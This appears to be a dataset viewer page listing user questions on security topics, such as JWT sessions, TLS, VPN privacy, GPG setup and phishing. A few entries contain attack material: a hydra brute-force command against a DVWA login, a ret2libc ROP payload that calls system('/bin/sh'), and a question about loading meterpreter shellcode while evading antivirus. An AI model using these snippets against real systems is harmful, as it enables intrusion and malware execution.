instruction stringlengths 24 29.9k |
|---|
I recently started working on adding custom code to HubSpot forms after their form is loaded via an iFrame. Initially, I was using the following code to access the iFrame to change it:
var form = window.docuemnt.querySelector("[data-reactid='.hbspt-forms-0.5.1.0']"]
if(form != null && form.getAttribute("data-abc") == n... |
I've been considering how continuous integration/delivery environments handle code signing.
If I maintain some open source project which uses a CD environment to build binaries to ship to users, I may wish to sign the binaries which are produced, so that users can verify they originate from me.
My question would be, is... |
$ hydra 127.0.0.1 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form “/dvwa/vulnerabilities/brute/?username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=4jpaqj7i6d88g7im1hlpq21ad9”
zsh: parse error near `&'
|
There is the following option in ncrack (from the man page):
Misc options:
ssl: enable SSL over this service
ssl (Enable/Disable SSL over service)
By enabling SSL, Ncrack will try to open a TCP connection and then
negotiate a SSL session with the target. Everything will then be
transparently encrypted and decrypted.... |
The organization I work for uses Malicious Domain Blocking and Reporting (MDBR), which is a service provided by Center for Internet Security (CIS). MDBR technology prevents IT systems from connecting to harmful web domains, helping limit infections related to known malware, ransomware, phishing, and other cyber threats... |
So the people at my new work set up a vpn on my personal pc today, windows style, so now when I go into network tab I can pick their company connection. What they don't know is that I have another client where I use citrix. Will connecting to the company vpn system wide let them know I have another client? Basically, c... |
If a user was using your application on a public computer and were to log out of your website without closing the tab, the next person to use this computer could snoop through the console and look for errors logged there. Even if you weren't explicitly logging any request errors to the console you could forget to catch... |
I read this https://medium.com/@betable/tifu-by-using-math-random-f1c308c4fd9d
and if the key is generated with an old browser using math.random via chrome v8, could the AES encrypted message be cracked just by trying all the combinations? This assumes you only have the output and not the computer.
this however suggest... |
The cross-platform port of doas, opendoas, has a persist feature that basically caches the user's password so they don't have to enter it repeatedly. It seems like many people consider this insecure.
As I understand it, BSD has some fancy kernel feature to do persistence securely. Linux does not, hence opendoas reimple... |
I mean, for example, if you have configured your home router to Cloudflare's or Google's DNS settings - now, does it make any sense to alter you DNS settings -again- at the your Laptop or Mobile devices or use any WARP App?
Can DNS settings be configured twice i.e both at router level and device level? Does it provide ... |
Should ga gid gat and Fbp cookies be flagged as Secure and HttpOnly?
Is there a way an attacker can use them if accessed?
|
I'm testing a web application and burp detected this issue:
Cross-origin resource sharing: arbitrary origin trusted
Looking at the response, I only see this header:
Access-Control-Allow-Origin: https://www.evil.com
Considering the lack of this header set to true in the response:
*Access-Control-Allow-Credentials: true ... |
Someone is running an automated scan on our SSL setup and they insist that our root certificate be included in all the following CA stores:
"Mozilla NSS - 01/2014"
"Apple - OS X 10.9.2"
"Java 6 - Update 65"
"Microsoft - 04/2014"
Now, I could argue about the list of CA stores they are using for their tests but this is... |
My boss is very concerned about malware. He has heard that malware usually comes in via email attachments, and so he wants me to set up a computer specifically for that task and isolate it somehow.
Is this a practical idea? If so, what steps should I take to isolate the computer? Would turning network discovery off be ... |
Bank account have portals that one can access online.
After entering my uname/password, OTP is sent via SMS to mobile phone.
After entering OTP and password again, one is allowed access to online banking portal.
My concern is what happens when phone is lost.
I understand the security concerns using an email associated ... |
Or Windows 11 pre-release, just cause I'm curious?
(By employees if that wasn't implicit.)
|
I have a static react app which users login via an Okta SPA app.
The app receives a JWT, which it is stored in the browser, and passed to the backend API via Authentication header on every request.
The API using Azure API Management. They provide "policies" to validate JWT tokens.
<validate-jwt header-name="Authorizat... |
I'm a freshman in university, and I recently moved into residence. Pretty quickly, I logged into campus wifi so I can actually do classes and things.
My laptop and primary phone logged in with minimal complaining, but my secondary/legacy phone had problems. I went to the site that explained how to log into the wifi, bu... |
The password in VeraCrypt is used to en-/decrypt a header, that contains a master key, that is used to en-/decrypt the data.
I know, that I can change the password, which will not change the master key and thus be quite fast. But if I have the suspicion, that someone gained access to my header and is able to crack my p... |
If a device running a WhatsApp account has already be compromised. Can the attacker steal session cookies/encryption keys on the device and establish a persistent connection to receive calls and messages sent to the device?
Would this be possible if the phone has been turned off, but the WhatsApp account has not been r... |
In my company, numeric user IDs are considered PIIs and therefore need to be pseudo-anonymized to be GDPR compliant.
To do so, we populate a lookup table where to each ID is assigned a monotonically decreasing gdpr_ID. Then when users are inactive or request to be deleted, we simply update the ID column by using the gd... |
In other words: Does Safari's "Prevent cross-site tracking" option effectively prevent cross-site tracking? (Is it for purpose?) I though it would work; are my expectations off?
Or, more specifically, I'm wondering: Why is Facebook data reappearing in Safari (14.1.2) without me visiting or having any Facebook web pages... |
I'm interested to know how someone would be able to hack (i.e. gain remote access) to an iPhone. Would knowing the iCloud password tied to the device be sufficient? Or would they also need to have gotten physical access to the device?
How would this work? This happened to me, and I'd like to know how to recover and pre... |
When I try to use the module to intercept data to vulnweb, the target machine loses connectivity to the internet. Sometimes I am able to intercept the data but it looks like my terminal is stuck in an endless loop where I do intercept the data but the form is not sent successfully to the server.
I get this in an endles... |
Here is the code:
import struct
buf = ""
buf += "A" * 552
buf += struct.pack('<Q', 0x401493) # pop rdi; ret
buf += struct.pack('<Q', 0x7ffff7f79152) # /bin/sh
buf += struct.pack('<Q', 0x7ffff7e37e50) # system
file = open('in.txt', 'wb')
file.write(buf)
Running in gdb shows this:
[Attaching after process 5973 vfor... |
What are the differences between the CIS hardened linux and SELinux(security linux)? Also, all the public cloud service providers support CIS hardened linux. Does it mean SELinux has lost the battle? Or in terms of security, which flavor should I be choosing/using for a safety systems such as SIL4(SAFETY INTEGRITY LEVE... |
How reliable is a mathematical model of a human fingerprint for identification?
I am looking for a way to uniquely identify individuals that is very reliable and easy to use that does not require storing actual biometric data. Storing the actual biometric data would seem to violate privacy. The method outlined in this ... |
I'm attempting to establish a process for setting up a new GPG identity for myself and my threat model.
Much of it is following guides which I believe are still considered best practices:
https://github.com/drduh/YubiKey-Guide
https://blogs.itemis.com/en/openpgp-on-the-job-part-4-generating-keys
https://dev.to/benja... |
I find that session ids are different between 2 peers (client and server) in same tls handshaking process. Why should these two values be different? I studied before that when a new session is established the session id field is empty, but I see this picture.
I capture traffic between my client and web server which is... |
while debugging some strange effects in my home network (bad video call quality due to packet loss) I found out this only happens when my RBPI is connected to the network. When I wanted to log in I discovered that the default password was not working any more. I was not thinking much about it and assumed I changed the ... |
I have a cheap cellphone bought about ten years ago. It has a physical SIM card. I have in-phone "deleted" all sent and received messages, but very strongly suspect that these are still there (as well as any deleted contacts) whether I stored them on the SIM card or on the internal storage memory of the phone.
I bet an... |
I am just getting into ethical hacking and cybersecurity and would like some advice regarding USB Wi-Fi adapter. I am hacking on Raspberry PI 3 which is running Kali Linux. Furthermore, I have been following this video link
and been learning about aircrack-ng hacking tool.
What I am confused about, is whether I need th... |
Basically these 3 processes open for about 1/3 of a second and then instantly close on my task manager. I don't know what it is and I wasn't able to find anything on google about it. I am a little worried it might be malware but like I said I just don't know what it is.
|
during the static analysis while pentesting an android application I found the following information to connect to a firebase instance.
<string name="google_app_id">1:**REDACTED**:android:**REDACTED**</string>
<string name="google_api_key">AIza**REDACTED**</string>
<string name="firebase_database_url">https://**REDACTE... |
I work in cybersecurity and would like to find an older laptop that doesn't have the Intel Management Engine built-in, while still able to run a Debian OS well.
I have an IBM ThinkPad t42 with 42T0273 system board laying around, which was introduced in late 2004. While it likely doesn't have IME on it, I found that t42... |
I am connecting an Arduino Uno to the internet via ethernet (using the ethernet shield v2) and querying NTP time. Making requests to a NTP server is the only internet related thing it does. You can use the ethernet shield as an SD card to host data, I WILL NOT be doing that. It will only be querying NTP.
I'm worried th... |
Extend version of the question
I'm trying to figure out how to detect the launch of unwanted processes based on regular logging in Windows and sysmon. Sysmon event 1 allows you to get a significant amount of information about the running process: OriginalFileName, User, LogonGuid, Hashes, and so on. For example:
Proces... |
As per my understanding, JWTs are signed tokens which can be used to identify users, if used as session tokens, they can eliminate need to store session on server ie. they are stateless.
Suppose I store user_id in JWT token and use it to validate users on server, how would a user actually log out?
Just deleting token f... |
The company I'm working in wants to develop a CRM that is cloud-based and we will need to store the data safely.
I've been searching for a way to create a strategy to save and secure data but I don't seem to find the answers I'm looking for.
We don't want to have access to sensitive data, so that data should be encrypt... |
In case of a virtual machine it is possible to break out of the VM and gain code execution on the host. In that way you could evade any detection mechanism for malware inside the VM and maybe even on the host.
In case of the virtual machine malware would then run at ring -1.
Is it possible to subvert a physical system ... |
I have a system with custom cipher suites specified in this registry key
HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002!Functions
TLS_AES_256_GCM_SHA384
TLS_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TL... |
I detected an activity last week on our SIEM system. The MsMpEng.exe which belongs to Windows Defender access lsass.exe. I search it on the net for learn is it a normal acitivty or is it anormal then there is no information about it. Activity's event ID is 4656. Anyone can explain it for me? Why windows defender access... |
I'm pentesting an android application written in Cordova and while inspecting the network traffic I found some interesting endpoint that I would like to test.
However, this endpoint need a tokenID (ex. eyJ[...].eyJ[...]) and I don't know why, even after doing SSL unpinning (with more than one Frida script), I'm unable ... |
If i run
netstat -an
on my Windows Server 2019 it shows multiple connections on Port 3389 (which is RDP)
The first IP Adress is mine, however i cant explain the other two connections. They both change their IP-Adress about every minute and if i google them, they ofthen have a negative reputation like being blacklist... |
Is there a security risk to disabling the windows user account password, since my PC is already unlocked with a complex pin at boot time? I have my PC configured with sleep disabled. I'm running windows 10 pro.
For example, is windows network security reduced?
|
Let's say that Malory owns an official website that now says that her birthday is on 25th of July. I can connect to that website by https, and SSL sertificate of the connection says "issued to Malory". Now I want to download that page as an evidence, that Malory published it. I know that she will later remove or change... |
So far I have owned a Google profile since 2016, and I had no problems until now when I began detecting unusual/bizarre messages in my 'Spam' folder.
This suspects me that operating a social networking account (e.g., Twitter), which I did back in August, also puts your email open to spam. Earlier today I got a weird me... |
If I turn on Apple’s private relay function on my iPad, will the TLS handshake still be with the website I am visiting or with the ingress proxy by Apple?
Or in other words, can Apple or the exgress proxy read my internet traffic with this function enabled?
|
Are we inviting any problems if we add localhost and 127.0.0.1 to the subject alternative name field of an x509 certificate?
We are still trusting the appropriate root CA, but relaxing the rules of the name just a bit.
|
Academia has had some high profile cases of forged identity; for instance, in the last decade the publisher Springer has had to retract 62 papers for this reason alone.
Usually these aren't high-effort attacks, just email address spoofing, etc. These often go something like this:
An early-career author writes/fabricat... |
Here are my conditions:
My Rest API must accept username and plain password. But, that's very bad. That's why the client must encrypt the password first and my rest API will decrypt it to get the plain password.
My client and rest API already set the encryption method using AES-256.
The key and iv for AES-256 are gene... |
When I log into my Google account from my laptop with 2FA enabled, I usually get a prompt on my smartphone in order to confirm the log in. I tap OK and then I am logged in.
However sometimes I am not immediately logged in after that. My laptop then shows a screen like this:
Then on my smartphone I get something like ... |
I would like to use the method described in https://connect2id.com/products/nimbus-jose-jwt/examples/jwk-generation to generate a key pair in a java application:
import java.util.*;
import com.nimbusds.jose.jwk.*;
import com.nimbusds.jose.jwk.gen.*;
// Generate 2048-bit RSA key pair in JWK format, attach some metadat... |
I have a server with a number of Linux bridge devices for use with groups of virtual machines - some internet-routed, some intentionally unrouted. I have stateful firewalling in place for traffic traversing across and between those bridges. Excerpt:
ip6tables -A FORWARD -m conntrack --ctstate ESTABLISHED -j ACCEPT
ip6t... |
We are building a Chrome Extension that will be force-installed on each employee's browser for the companies we work with.
We currently use OAuth but many employees are forgetting to sign up.
We are thinking of replacing OAuth with something that doesn't require employee interaction. One way was setting up per-company ... |
I'm working on an application which uses ECDSA certificates. After the cert generation, they should be verified but currently the following error is received:
C = CA, ST = BC, L = City, O = Corp, OU = Software, emailAddress = administrators@corp.com, CN = va.corp.com
error 18 at 0 depth lookup: self signed certificate
... |
I know how MITM attacks work (theory/videos on the subject etc), but I am a bit confused and not sure what are the worst-case scenarios that can happen.
If I'm using a public VPN and someone is indeed able to force my device to make a connection through theirs, they will be able to see where my connection goes and can ... |
There are a lot of different URL shorteners out there, like Bitly or TinyURL. Besides their main purpose of shortening a link, they also:
obfuscate the actual URL
collect statistics about the usage of the short link
From the obfuscation, at least two risks arise:
The actual URL might have been obfuscated to hide its... |
I have set up MitmProxy with a Python script to intercept network responses from one domain, used by a Desktop App. However, when I start up the App, I get the following series of transactions
{
"code": 200,
"message": "Success",
"data": {
"key1": "<redacted>",
"key2": "<redacted>",
... |
According to the "Single sign-on" page on Wikipedia:
A simple version of single sign-on can be achieved over IP networks using cookies but only if the sites share a common DNS parent domain.
This means that if the user has authenticated on login.foo.org, then
the web-server on login.foo.org issues an authentication c... |
My network sniffer for websites has discovered a number of hosting domains in the report which I can not correctly assign to categories. I don't know if there are providers behind these domains that load tags or trackers or if malware/adware simply appeared in the network traffic from the website users.
What I have tri... |
While making a website I made an interesting mistake, and I'm wondering if this could be used to achieve XSS. I've come very close, but not quite.
I can put my user input into a string inside of a <script> tag. It looks something like this:
<script>
// some code above
some_variable = "my user input"
// some code below
... |
I try to execute a meterpreter shellcode to a windows machine. In order to bypass the AV, I try to load the shellcode in the memory thanks to the DelegateType Reflection technique. Below, the first lines of the powershell commands:
$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssem... |
Here's our scenario. I have a NodeJS server running that connects to a Microsoft SQL Server using an application account (SQL Basic Auth). The Username and Password were stored in the configuration files when the app was created.
We now want to tighten down security. Originally, an idea was floated of using Environm... |
My company distributes software that runs on locally installed Ubuntu Virtual Machines. To update the software, we pull our latest code down from Github.
Some IT departments have github blocked on their firewall. One IT guy suggested to us that they would be more open to adding a permanent rule to their firewall if we ... |
I have seen multiple videos/tutorials regarding how to setup the email system in Django.
It seems that they all assume as long as the password is stored in an environmental variable, no encryption is required.
Is that so? Shouldn't passwords be encrypted? Is it because TLS provides some sort of security that makes it O... |
When we are talking about JWT authentication, how big of a security risk would it be to eliminate the concept of a refresh token and just have a single JWT have an expiration time of, let's say 30 days.
The refresh token could still be accessed by a cookie / local storage (even though many people also thinks this is a ... |
Looking at this question Openid connect nonce replay attack and the answer by @benbotto. I understand the replay attack in implicit flow but unable to understand it for auth code flow. Let's say an attacker intercepts the authentication response. The attacker could then paste the response (the 302 location) into their ... |
Facial recognition is ubiquitous and methods like disguises, surgical masks and makeup are becoming ineffective owing to the improvement in algorithms.
In light of these advances, what are some countermeasures to avoid being identified in a public setting (cafe, restaurant, street etc)?
The purpose is to be able keep o... |
During experimentation with the gobuster tool, and trying to find the subdomains matches of a domain (let's call that testdomain.com), I got some strange results and I explain.
The command used was $ gobuster dns -d testdomain.com -w mywordlist.txt -o subdomain_results.txt which gave me a list of subdomains (like examp... |
I am running a server with Django and Nginx. I tried to hide the admin panel by assigning it a 50digit random string as URL (something like https://mydomain/asidfhifuerbdsi...). Now someone found this URL and I am wondering if this was possible without hacking my page.
More information:
There is a sitemap, but the URL... |
Some of my files have been encrypted by ransomware. I can find some backup of files (unfortunately not all of them). Can I find the password of the 7Z zipped+encrypted files if I also have some of the original files?
|
I have a question related to this FAQ:
https://pcissc.secure.force.com/faq/articles/Frequently_Asked_Question/How-does-encrypted-cardholder-data-impact-PCI-DSS-scope?q=how+does+encrypted+data+impact+the+scope&l=en_US&fs=Search&
It says:
The following are each in scope for PCI DSS:
Systems performing encryption and/or... |
As described here: https://tools.ietf.org/id/draft-ietf-oauth-security-topics-13.html#proposed-countermeasures-2
Note on pre-warmed secrets: An attacker can circumvent the
countermeasures described above if he is able to create or capture the
respective secret or code_challenge on a device under his control,
which is ... |
For example, can an .exe file be spoofed in .txt or .mp3 in Windows and still be executed as an executable?
I know some basic methods like:
using right-to-left override character (U+202E)
winrar 4 zip file exploit (no longer working)
Is there another new method of doing it in a recent version of Windows?
|
There are many articles out there stating that a user's encrypted files are lost after an administrator resets the password of that user.
I tried:
Logged on as user (Domain User) with password 54321
created a file named test.txt on the desktop
encrypted the file using EFS (The certificate was automatically generated)
... |
I was wondering if the connection towards the ocsp responder/server is TLS encrytped itself. Meaning that the client requesting a validity check for a certificate verifies the OCSPs server certificate?
If so that OCSP server should be signed by the a root ca (which the client can verify via its truststore) in order to ... |
I want to analyze the traces of a program in my VM by executing it and then capturing the memory and disk using FTK Imager.
However, it looks like --given the environment I have-- the program only runs for a couple seconds, and --since the target program is done before FTK ends-- the memory snapshot doesn't show the ex... |
Assuming a private_key.pem and the associated certificate client_cert.pem signed by CA (CSR signed with private_key.pem).
Next, I create the pfx container with:
# create pfx with private_key.pem and client_certificate.pem
openssl pkcs12 -export -in client_cert.pem -inkey private_key.pem -certfile client_cert.pem -out c... |
I'm currently working at home. My employer provides me a VPN access to the company resources: intranet, ssh access to computers, etc. I was wondering what exactly means to use a VPN, and what type of information my employer can "see" of my use of the internet. Is all traffic routed through my company, so they can see w... |
In a buffer overflow exploit, when we use a JMP ESP instruction to jump to the ESP, instead of using the address of the JMP ESP, can't we use the opcodes of it?. I generated the opcodes of the JMP ESP instruction with mona in Immunity Debugger.
!mona assemble -s "JMP ESP"
Which was \xff\xe4
In my case, the offset wher... |
I usually receive e-mails from an organization called Change.org, that is a site for create on-line petitions (it's site is https://www.change.org/).
The thing is, they send me e-mails with suggestions about petitions to sign in, but the sender's email is change@f.change.org.
I started to think about this e-mail and I'... |
If someone uses the administrator Windows account for everyday work while having the default UAC settings they will be prompted by UAC whenever an application other than certain predefined system apps requires elevated permissions. From the security point of view this is equivalent to no protections against malware get... |
Why would different JetBrains IDE products need to query the installed antivirus product in the exact same way that malicious programs do?
The wmi command is the following:
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate
I observed this command coming from idea64 (intellij) and... |
I currently have a fiber optic internet connection at home. My ISP uses GPON where the ONU acts as a gateway device which has a direct fiber optic connection to it. ONU is a Huawei HG8145V5.
I understand that downstream network traffic in a GPON splitter network is broadcast to all ONUs simultaneously,and each ONU does... |
These days I see many apps request access to photos on iPhone. I understand app request access to photos to iOS which then request access to me, that sounds ok. In that context I can allow access to all photos or just some (I don't remember all the options).
What happens when app have access to your photos? Does it me... |
I am curious about the Integrity metric in CVSS 3.1.
Low is:
"Modification of data is possible, but the attacker does not have
control over the consequence of a modification, or the amount of
modification is limited. The data modification does not have a direct,
serious impact on the impacted component."
High is:
"T... |
When GPS is spoofed in a smartphone, does this affect whatever is being monitored? Suppose I spoof the GPS on my smartphone, such as lazy Pokemon GO players do to play from their couch. Will this spoof be transmitted to a surveillance agency that could be monitoring the device? Or will it only affect the results on the... |
I recently found that the latest release of a major Linux distribution (MX Linux) uses DSA-1024 in /etc/apt/trusted.gpg and in /etc/apt/trusted.gpg.d/*.gpg
It also probably uses SHA-1 as the signature algorithm (which is the most common one used with DSA-1024)
Is using DSA-1024 safe, especially considering the fact tha... |
There are a variety of anti-audio recording devices out there, including white noise generators which can block audio recording equipments especially phones. What specs should I be looking for if I want a device that will work against all audio recording devices? Is that even technically possible?
|
I have bunch of cat images whose names are sha1 of website where it was posted.
Here is an example: 3afec3b4765f8f0a07b78f98c07b83f013567a0a.jpg
website: http://www.example.com/image.jpg
If sha1 is simple/dumb function i.e. hash = sha1('text with no random salt attached') and every time it produces the same hash result... |
I live in a student house with 2 guys and a girl and I'm not very tech-savvy. When we moved in we got Virgin Media broadband. I have set this up before and the admin panel is very basic with no features that allow you to be intrusive.
Shortly after moving in, one of my housemates (let's call him Steve) started insistin... |
I have golang app that works as server which a single client accesses by the IP hostname (aaa.bbb.ccc.ddd). Trying to implement mTLS.
Since I have only one client, its cert/key pair (myclient.crt/myclient.key) is directly stored in the server app with the self-signed CA cert (notmyca.crt).
The connection between both w... |
I understand, that mobile phone verification is probably the most convenient way to validate real users and avoid spam, but those "secure/private" messengers are afterward still bound to phone numbers, and this has inherent vulnerabilities with regard to security - your whole account depends on SMS codes (and as discu... |
I have the following setup Nginx + php-fpm, Nginx is running on port 80 and 443.
Recently I noticed that connections were made from this servers port 80 to a remote machine on port 580x. [ src port is 80 (Nginx) and dst port is 580x]
Has someone seen such an exploit before ? I have checked the Nginx logs, nestat connec... |
I'm implementing custom authentication & session management system in Node.js & PostgreSQL. My goal is to implement sessions that expire after 2 weeks (if not refreshed/renewed).
OWASP and other resources suggest to store unhashed session IDs both in database and cookie. However, if those session IDs are leaked from th... |
I use the same email address for the AWS root user and my Amazon shopping account.
Unfortunately the password for both parts of Amazon is also the same, when I change the AWS password I automatically have the same for the shopping part.
But I want to have different passwords (but same email address), how do I manage th... |
I click a link with good content (this doesn't guarantee the site isn't compromised) and Firefox gives me this error:
Websites prove their identity via certificates. Firefox does not trust this site because it uses a certificate that is not valid for example.net. The certificate is only valid for the following names: ... |
can HSTS be considered asa remediation for the vulneraberabity "cookies are not protected by secure flag" for a PCI DSS auditor?
|
I recently discovered the problem with Percent-encoding.
It makes perfectly sense when we are dealing with such problem in a browser scenario. But I don't get why a software like WinSCP can be affected by the same issue.
In my opinion the special character encoding/decoding shouldn't happen in normal SFTP software (as ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.